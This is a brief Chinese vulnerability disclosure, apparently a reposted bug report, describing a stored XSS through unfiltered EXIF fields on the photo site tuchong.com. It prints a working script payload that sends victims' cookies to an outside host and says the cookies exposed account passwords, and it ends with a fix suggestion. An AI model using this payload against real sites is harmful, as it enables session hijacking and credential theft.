存储型XSS+Cookie泄漏导致账户泄漏 EXIF里信息过滤不严格哈~ javascript标签过滤了,script没过滤。 我们来构造个 </A></DD><script>document.write('<img src="http://lab.sh1ne.net/snap.php?c='+document.cookie+'" width=0 height=0 border=0 />');</script> okay~ 访问 http://tuchong.com/278719/3383088/exif/ 我这边就能抓到cookie了。 很惊讶,帐号密码固然保存在cookie里面。。。 于是我这边就能抓到帐号和密码了。。。 漏洞 证明: http://tuchong.com/278719/3383088/exif/ 修复方案: EXIF也得加过滤哈~ 包括你们旗下的EXIF查看器
查看更多关于图虫网存储型XSS+Cookie泄漏导致账户密码泄漏 -的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13937